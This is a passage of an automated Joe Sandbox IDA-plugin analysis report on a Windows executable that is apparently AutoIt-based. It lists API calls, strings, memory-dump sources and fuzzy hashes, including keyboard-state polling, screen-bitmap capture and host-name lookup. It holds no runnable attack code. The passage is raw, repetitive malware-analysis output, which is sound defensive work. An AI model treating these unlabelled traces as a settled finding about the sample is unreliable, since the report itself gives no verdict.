                                                                                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoItemMenu$Sleep
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 1196289194-4108050209
                                                                                                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                        • String ID: (
                                                                                                        • API String ID: 3300687185-3887548279
                                                                                                        • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                        • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                        APIs
                                                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                        • API String ID: 1976180769-4113822522
                                                                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                        • String ID:
                                                                                                        • API String ID: 461458858-0
                                                                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3969911579-0
                                                                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 956284711-4108050209
                                                                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                        • String ID: 0.0.0.0
                                                                                                        • API String ID: 1965227024-3771769585
                                                                                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SendString$_memmove_wcslen
                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                        • API String ID: 369157077-1007645807
APIs
• GetParent.USER32 ref: 00445BF8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
• __wcsicoll.LIBCMT ref: 00445C33
• __wcsicoll.LIBCMT ref: 00445C4F
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
Strings
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32(?), ref: 004787B9
• _wcscpy.LIBCMT ref: 004787E5
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 3052893215-2127371420
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
• __swprintf.LIBCMT ref: 0045E7F7
• _wprintf.LIBCMT ref: 0045E8B3
• _wprintf.LIBCMT ref: 0045E8D7
Strings
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-2354261254
APIs
Strings
Similarity
• API ID: __swprintf_wcscpy$__i64tow__itow
• String ID: %.15g$0x%p$False$True
• API String ID: 3038501623-2263619337
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
• __swprintf.LIBCMT ref: 0045E5F6
• _wprintf.LIBCMT ref: 0045E6A3
• _wprintf.LIBCMT ref: 0045E6C7
Strings
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-8599901
APIs
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(?), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
• IsWindow.USER32(?), ref: 00443C3A
• EndDialog.USER32(?,00000000), ref: 00443C4C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                        • String ID: BUTTON
                                                                                                        • API String ID: 1834419854-3405671355
                                                                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • _wprintf.LIBCMT ref: 00454074
                                                                                                        • __swprintf.LIBCMT ref: 004540A3
                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                        • API String ID: 455036304-4153970271
                                                                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                        APIs
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                        • _memmove.LIBCMT ref: 00467EB8
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                        • _memmove.LIBCMT ref: 00467F6C
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2170234536-0
                                                                                                        • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                        • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
